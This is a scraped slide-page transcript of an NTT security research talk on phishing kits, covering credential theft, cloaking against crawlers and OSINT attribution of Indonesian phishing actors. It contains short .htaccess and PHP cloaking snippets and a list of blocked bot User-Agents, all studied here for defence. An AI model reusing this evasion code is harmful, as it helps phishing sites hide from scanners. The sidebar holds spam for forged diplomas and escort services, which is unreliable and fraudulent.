科罗拉多大学波尔得分校毕业证学位证成绩单-可办理科罗拉多大学波尔得分校毕业证学位证成绩单-可办理
科罗拉多大学波尔得分校毕业证学位证成绩单-可办理e4aez8ss
 
Consent & Privacy Signals on Google *Pixels* - MeasureCamp Amsterdam 2024
Consent & Privacy Signals on Google *Pixels* - MeasureCamp Amsterdam 2024Consent & Privacy Signals on Google *Pixels* - MeasureCamp Amsterdam 2024
Consent & Privacy Signals on Google *Pixels* - MeasureCamp Amsterdam 2024thyngster
 
RadioAdProWritingCinderellabyButleri.pdf
RadioAdProWritingCinderellabyButleri.pdfRadioAdProWritingCinderellabyButleri.pdf
RadioAdProWritingCinderellabyButleri.pdfgstagge
 
Predicting Salary Using Data Science: A Comprehensive Analysis.pdf
Predicting Salary Using Data Science: A Comprehensive Analysis.pdfPredicting Salary Using Data Science: A Comprehensive Analysis.pdf
Predicting Salary Using Data Science: A Comprehensive Analysis.pdfBoston Institute of Analytics
 
Student Profile Sample report on improving academic performance by uniting gr...
Student Profile Sample report on improving academic performance by uniting gr...Student Profile Sample report on improving academic performance by uniting gr...
Student Profile Sample report on improving academic performance by uniting gr...Seán Kennedy
 
modul pembelajaran robotic Workshop _ by Slidesgo.pptx
modul pembelajaran robotic Workshop _ by Slidesgo.pptxmodul pembelajaran robotic Workshop _ by Slidesgo.pptx
modul pembelajaran robotic Workshop _ by Slidesgo.pptxaleedritatuxx
 

Recently uploaded (20)

Conf42-LLM_Adding Generative AI to Real-Time Streaming Pipelines
Conf42-LLM_Adding Generative AI to Real-Time Streaming PipelinesConf42-LLM_Adding Generative AI to Real-Time Streaming Pipelines
Conf42-LLM_Adding Generative AI to Real-Time Streaming Pipelines
 
Advanced Machine Learning for Business Professionals
Advanced Machine Learning for Business ProfessionalsAdvanced Machine Learning for Business Professionals
Advanced Machine Learning for Business Professionals
 
Vision, Mission, Goals and Objectives ppt..pptx
Vision, Mission, Goals and Objectives ppt..pptxVision, Mission, Goals and Objectives ppt..pptx
Vision, Mission, Goals and Objectives ppt..pptx
 
INTERNSHIP ON PURBASHA COMPOSITE TEX LTD
INTERNSHIP ON PURBASHA COMPOSITE TEX LTDINTERNSHIP ON PURBASHA COMPOSITE TEX LTD
INTERNSHIP ON PURBASHA COMPOSITE TEX LTD
 
Semantic Shed - Squashing and Squeezing.pptx
Semantic Shed - Squashing and Squeezing.pptxSemantic Shed - Squashing and Squeezing.pptx
Semantic Shed - Squashing and Squeezing.pptx
 
Thiophen Mechanism khhjjjjjjjhhhhhhhhhhh
Thiophen Mechanism khhjjjjjjjhhhhhhhhhhhThiophen Mechanism khhjjjjjjjhhhhhhhhhhh
Thiophen Mechanism khhjjjjjjjhhhhhhhhhhh
 
Call Us ➥97111√47426🤳Call Girls in Aerocity (Delhi NCR)
Call Us ➥97111√47426🤳Call Girls in Aerocity (Delhi NCR)Call Us ➥97111√47426🤳Call Girls in Aerocity (Delhi NCR)
Call Us ➥97111√47426🤳Call Girls in Aerocity (Delhi NCR)
 
20240419 - Measurecamp Amsterdam - SAM.pdf
20240419 - Measurecamp Amsterdam - SAM.pdf20240419 - Measurecamp Amsterdam - SAM.pdf
20240419 - Measurecamp Amsterdam - SAM.pdf
 
Predictive Analysis for Loan Default Presentation : Data Analysis Project PPT
Predictive Analysis for Loan Default  Presentation : Data Analysis Project PPTPredictive Analysis for Loan Default  Presentation : Data Analysis Project PPT
Predictive Analysis for Loan Default Presentation : Data Analysis Project PPT
 
Learn How Data Science Changes Our World
Learn How Data Science Changes Our WorldLearn How Data Science Changes Our World
Learn How Data Science Changes Our World
 
NLP Data Science Project Presentation:Predicting Heart Disease with NLP Data ...
NLP Data Science Project Presentation:Predicting Heart Disease with NLP Data ...NLP Data Science Project Presentation:Predicting Heart Disease with NLP Data ...
NLP Data Science Project Presentation:Predicting Heart Disease with NLP Data ...
 
9711147426✨Call In girls Gurgaon Sector 31. SCO 25 escort service
9711147426✨Call In girls Gurgaon Sector 31. SCO 25 escort service9711147426✨Call In girls Gurgaon Sector 31. SCO 25 escort service
9711147426✨Call In girls Gurgaon Sector 31. SCO 25 escort service
 
Identifying Appropriate Test Statistics Involving Population Mean
Identifying Appropriate Test Statistics Involving Population MeanIdentifying Appropriate Test Statistics Involving Population Mean
Identifying Appropriate Test Statistics Involving Population Mean
 
RABBIT: A CLI tool for identifying bots based on their GitHub events.
RABBIT: A CLI tool for identifying bots based on their GitHub events.RABBIT: A CLI tool for identifying bots based on their GitHub events.
RABBIT: A CLI tool for identifying bots based on their GitHub events.
 
科罗拉多大学波尔得分校毕业证学位证成绩单-可办理
科罗拉多大学波尔得分校毕业证学位证成绩单-可办理科罗拉多大学波尔得分校毕业证学位证成绩单-可办理
科罗拉多大学波尔得分校毕业证学位证成绩单-可办理
 
Consent & Privacy Signals on Google *Pixels* - MeasureCamp Amsterdam 2024
Consent & Privacy Signals on Google *Pixels* - MeasureCamp Amsterdam 2024Consent & Privacy Signals on Google *Pixels* - MeasureCamp Amsterdam 2024
Consent & Privacy Signals on Google *Pixels* - MeasureCamp Amsterdam 2024
 
RadioAdProWritingCinderellabyButleri.pdf
RadioAdProWritingCinderellabyButleri.pdfRadioAdProWritingCinderellabyButleri.pdf
RadioAdProWritingCinderellabyButleri.pdf
 
Predicting Salary Using Data Science: A Comprehensive Analysis.pdf
Predicting Salary Using Data Science: A Comprehensive Analysis.pdfPredicting Salary Using Data Science: A Comprehensive Analysis.pdf
Predicting Salary Using Data Science: A Comprehensive Analysis.pdf
 
Student Profile Sample report on improving academic performance by uniting gr...
Student Profile Sample report on improving academic performance by uniting gr...Student Profile Sample report on improving academic performance by uniting gr...
Student Profile Sample report on improving academic performance by uniting gr...
 
modul pembelajaran robotic Workshop _ by Slidesgo.pptx
modul pembelajaran robotic Workshop _ by Slidesgo.pptxmodul pembelajaran robotic Workshop _ by Slidesgo.pptx
modul pembelajaran robotic Workshop _ by Slidesgo.pptx
 

Manabu Niseki, Hirokazu Kodera - Catch Phish If You Can: A Case Study of Phishing Website and Actor

  • 1. Copyright©2019 NTT corp. All Rights Reserved. Catch Phish If You Can A Case Study of Phishing Website and Actor 2019.05.15 Hirokazu Kodera & Manabu Niseki Copyright(c)2019 NTT Corp. All Rights Reserved.
  • 2. 2Copyright©2019 NTT corp. All Rights Reserved. • Manabu Niseki: • Researcher, NTT Secure Platform Laboratories • NTT-CERT • FIRST TC Bali 2018 & Internet Week 2018 speaker • Hirokazu Kodera: • Researcher, NTT Secure Platform Laboratories Who Are We?
  • 3. 3Copyright©2019 NTT corp. All Rights Reserved. THE STATE OF PHISHING
  • 4. 4Copyright©2019 NTT corp. All Rights Reserved. The State of Phishing Source: http://docs.apwg.org/reports/apwg_trends_report_q4_2018.pdf/ APWG stats: 785,920 phishing sites in 2018
  • 5. 5Copyright©2019 NTT corp. All Rights Reserved. How can we take countermeasures?
  • 6. 6Copyright©2019 NTT corp. All Rights Reserved. 知己知彼 Know yourself, know your enemy 孫子兵法 / The Art of War
  • 7. 7Copyright©2019 NTT corp. All Rights Reserved. HOW TO CATCH PHISHES
  • 8. 8Copyright©2019 NTT corp. All Rights Reserved. • Phishing kit: • A kit to deploy a phishing website. • It is possible to analyze a phishing website by obtaining a phishing kit. How to Catch Phishes
  • 9. 9Copyright©2019 NTT corp. All Rights Reserved. Phishing actors make an OPSEC fail. • e.g. paypal-support.big[.]com[.]my How to Catch Phishes
  • 10. 10Copyright©2019 NTT corp. All Rights Reserved. Phishing kit collecting methods: 1. Subscribing & generating feeds 2. Enumerating phishy URLs 3. Crawling the phishy URLs • An open directory website enables to download a phishing kit. How to Catch Phishes Phishing Kits Subscribe feeds • OpenPhish • PhishTank Generate feeds • CT logs • New domains Phishy URLs
  • 11. 11Copyright©2019 NTT corp. All Rights Reserved. INSIDE PHISHING KITS: HOW TO STEAL CREDENTIALS
  • 12. 12Copyright©2019 NTT corp. All Rights Reserved. How phishing kits steal credentials? • Two major ways: • Writing credentials to a local file. • Sending credentials to an actor’s email address. Inside Phishing Kits
  • 13. 13Copyright©2019 NTT corp. All Rights Reserved. Inside Phishing Kits Writing credentials to lolo.txt
  • 14. 14Copyright©2019 NTT corp. All Rights Reserved. Inside Phishing Kits Sending credentials to myloginbox@protonmail.com
  • 15. 15Copyright©2019 NTT corp. All Rights Reserved. Stats of email providers abused by actors Inside Phishing Kits 0 500 1000 1500 2000 2500 3000 3500 4000 mail.ru aol.com zoho.com protonmail.com mail.com outlook.com hotmail.com yandex.com yahoo.com gmail.com count
  • 16. 16Copyright©2019 NTT corp. All Rights Reserved. INSIDE PHISHING KITS: HOW TO CLOAK
  • 17. 17Copyright©2019 NTT corp. All Rights Reserved. • Some of phishing sites include a cloaking function. • Implemented with .htaccess and PHP • Cloaking targets: • IP address • User-Agent • HTTP Referer Cloaking Function of Phishing Kits Phishing site User Crawler A Normal user can access to the phishing site, while a crawler can’t access to it.
  • 18. 18Copyright©2019 NTT corp. All Rights Reserved. • Implementation example with .htaccess and PHP Cloaking Function of Phishing Kits RewriteEngine on RewriteCond %{HTTP_REFERER} example¥.com [NC,OR] RewriteCond %{HTTP_REFERER} www¥.example¥.com RewriteRule ^.* - [F,L] RewriteEngine on order allow,deny deny from 192.0.2.0/24 deny from 198.51.100.0/24 deny from example.com deny from env=stealthed allow from all Implementation example with .htaccess Access with Referer example.com or www.example.com, then the access will be denied. <?php if(strops(_$SERVER[‘HTTP_USER_AGENT’],’crawler’) or strops(_$SERVER[‘HTTP_USER_AGENT’],’bot’) ){ header(‘HTTP/1.0 404 Not Found’); exit; } ?> Implementation example with PHP Accessed with User-Agent crawler or bot, then the access will be denied.
  • 19. 19Copyright©2019 NTT corp. All Rights Reserved. • How to analyze a cloaking function in a phishing kit? 1. Deploy a phishing kit on the Web server in the closed environment. 2. Send HTTP requests with multiple conditions of HTTP header to a phishing kit. • User-Agent and Referer 3. Observe HTTP responses from a phishing kit. Dynamic Analysis Against Phishing Kits Analysis tool Phishing kit deployed on Web server User-Agent: testbot User-Agent: Bot HTTP/1.1 200 OK HTTP/1.1 403 Forbidden User-Agent Referer Closed environment
  • 20. 20Copyright©2019 NTT corp. All Rights Reserved. • About 12.9% of phishing kits have a cloaking function against User-Agent or Referer. • Analyzed phishing kits: 4,917 • Include cloaking function: 636 • Not include cloaking function: 4,281 • Respond “403 Forbidden”, “404 Not Found”. • Redirect to a legitimate site or a search engine. Dynamic Analysis Against Phishing Kits 12.9 % 87.1 % No Cloaking Function Cloaking Fucntion Redirect to Phishing Target google.com Dropbox, Apple yahoo.com PayPal www.linkedin.com LinkedIn www.paypal.com PayPal www.gov.uk UK Revenue Customs Agency www.asb.co.nz ASB Bank Summary of redirection to legitimate sites.Ratio of cloaking function Redirect to search engines Redirect to legitimate sites
  • 21. 21Copyright©2019 NTT corp. All Rights Reserved. • It is identifiable whether a phishing kit has a cloaking function or not by sending 13 patterns of HTTP request. • Analyzed 636 phishing kits which includes cloaking function. • 86.6% of phishing kits block a HTTP request with "Surfbot" User-Agent. • The result indicates a connection of phishing actors. The cloaking techniques may be shared with phishing actors. Dynamic Analysis Against Phishing Kits HTTP Header Parameter User-Agent Surfbot Referer spamcop.net User-Agent imo-google-robot-intelink User-Agent AdsBot-Google Referer http://http://safebrowsing- cache.google.com/ User-Agent ASPSeek User-Agent HSFT - LVU Scanner HTTP Header Parameter Referer altavista.com Referer google.com.ar User-Agent CoolBot User-Agent DISCo Pump 3.2 User-Agent NetZip Downloader User-Agent tor-exit
  • 22. 22Copyright©2019 NTT corp. All Rights Reserved. • How to check whether a phishing site has a cloaking function? 1. Access to a phishing site with HTTP header patterns analyzed in the previous step. 2. Observe HTTP response from a phishing site. Phishing Sites Including Cloaking Function Analysis Tool Phishing Site A GET http://example.jp/phishing.php User-Agent: Surfbot GET http://example.com/fake.php User-Agent: Surfbot HTTP/1.1 403 Forbidden HTTP/1.1 200 OK 1. User-Agent: Surfbot 2. Referer: spamcop.net 13. User-Agent: tor-exit HTTP Header Patterns GET http://example.com/fake.php Referer: spamcop.net HTTP/1.1 200 OK GET http://example.com/fake.php User-Agent: tor-exit HTTP/1.1 200 OK Phishing Site B Phishing Site A has cloaking function Phishing Site B doesn’t have cloaking function
  • 23. 23Copyright©2019 NTT corp. All Rights Reserved. • 10.4% of phishing sites have a cloaking function. • The number of accessed phishing site URLs: 4,901 • Some phishing sites may be not enable access control implemented with .htaccess. Phishing Sites Including Cloaking Function 10.4 % 89.6 % No Cloaking Function Cloaking Fucntion Ratio of cloaking function Analysis Tool Phishing Kit which have cloaking func. User-Agent: testbot User-Agent: testbot HTTP/1.1 403 Forbidden HTTP/1.1 200 OK Closed Environment Phishing Site Phishing site doesn’t deny access though same phishing kit has cloaking function Download Kit
  • 24. 24Copyright©2019 NTT corp. All Rights Reserved. • Some phishing kits have a cloaking function which makes analysis more difficult • IP address which connected to a phishing site is added to .htaccess file dynamically. • Access to the same phishing site again, the second access is redirected to legitimate site. Characteristic Cloaking Function Redirect the second connection to PayPal. • We need to care the cloaking function when researching phishing sites.
  • 25. 25Copyright©2019 NTT corp. All Rights Reserved. WHO DID IT?
  • 26. 26Copyright©2019 NTT corp. All Rights Reserved. Signature / Credits Analysis Th3 Exploiter
  • 27. 27Copyright©2019 NTT corp. All Rights Reserved. Signature / Credits Analysis Ak47-VbV
  • 28. 28Copyright©2019 NTT corp. All Rights Reserved. Signature / Credits Analysis Shadow Z118
  • 29. 29Copyright©2019 NTT corp. All Rights Reserved. • Signature / credits analysis makes possible to trace out phishing actors. • OSINT techniques: • Username check: • Check User Names, Knowem, Pipl • Domain and IP research: • RiskIQ, SecurityTrails, VirusTotal • Googling Signature / Credits Analysis
  • 30. 30Copyright©2019 NTT corp. All Rights Reserved. • Indonesian phishing actors: • RSJKINGDOM (a.k.a DarkLight) • DevilScream (a.k.a Z1coder) • Spammer ID • Others: • Hijaiyh(a.k.a justalinko), IDHAAM69, Indonesian Darknet and more. Chasing Indonesian Actors
  • 31. 31Copyright©2019 NTT corp. All Rights Reserved. CHASING INDONESIAN ACTORS: RSJKINGDOM
  • 32. 32Copyright©2019 NTT corp. All Rights Reserved. • RSJKINGDOM: • A developer of phishing kits targeting PayPal & Apple RSJKINGDOM
  • 33. 33Copyright©2019 NTT corp. All Rights Reserved. RSJKINGDOM RSJKINGDOM DarkLight
  • 34. 34Copyright©2019 NTT corp. All Rights Reserved. RSJKINGDOM
  • 35. 35Copyright©2019 NTT corp. All Rights Reserved. RSJKINGDOM
  • 36. 36Copyright©2019 NTT corp. All Rights Reserved. RSJKINGDOM
  • 37. 37Copyright©2019 NTT corp. All Rights Reserved. CHASING INDONESIAN ACTORS: DEVILSCREAM
  • 38. 38Copyright©2019 NTT corp. All Rights Reserved. • DevilScream: • A developer of an infamous phishing kit “16shop”. DevilScream
  • 39. 39Copyright©2019 NTT corp. All Rights Reserved. DevilScream Riswanda devilscream Z1coder
  • 40. 40Copyright©2019 NTT corp. All Rights Reserved. DevilScream Total: 768 domains (2019/03)
  • 41. 41Copyright©2019 NTT corp. All Rights Reserved. • GitHub as a C2 (since 16shop v2) DevilScream
  • 42. 42Copyright©2019 NTT corp. All Rights Reserved. • Attribution by Phishing AI: DevilScream Source: https://twitter.com/PhishingAi/status/1011688773610979328/
  • 43. 43Copyright©2019 NTT corp. All Rights Reserved. CHASING INDONESIAN ACTORS: SPAMMER ID
  • 44. 44Copyright©2019 NTT corp. All Rights Reserved. Spammer ID RSJKINGDOM’s profile picture on Kongknow
  • 45. 45Copyright©2019 NTT corp. All Rights Reserved. Spammer ID
  • 46. 46Copyright©2019 NTT corp. All Rights Reserved. • Spammer ID runs various services: • arakatestore[.]com • HTML to PDF Converter • Encrypt text with HTML Hidden Characters • carder[.]io • BIN checker • spmr[.]us • URL shortener • spammer[.]me • OCR reader, Priv8 tools and etc. Spammer ID
  • 47. 47Copyright©2019 NTT corp. All Rights Reserved. COUNTERMEASURES WE’VE TAKEN
  • 48. 48Copyright©2019 NTT corp. All Rights Reserved. • Reporting phishing websites: • To Google Safe Browsing • To hosting providers • Sharing a repot with LEAs & CSIRT/CERTs. Countermeasures We’ve Taken
  • 49. 49Copyright©2019 NTT corp. All Rights Reserved. CONCLUSIONS
  • 50. 50Copyright©2019 NTT corp. All Rights Reserved. • You can get phishing kits by leveraging OSINT. • The cloaking function in phishing kits makes it difficult to analyze. • But you can bypass it by knowing how it works. • You can take practical countermeasures against phishing attacks by analyzing phishing kits. Conclusions
  • 51. 51Copyright©2019 NTT corp. All Rights Reserved. ANY QUESTIONS?
  • 52. 52Copyright©2019 NTT corp. All Rights Reserved. • References: • DeepEnd Research: Indonesian Spam Communities • http://www.deependresearch.org/2018/09/indonesian- spam-communities.html • NetSecOps: Analysis of Phishing mail. Drone bought from Apple • http://netsecops.info/bought-a-drone-from-apple-really/ References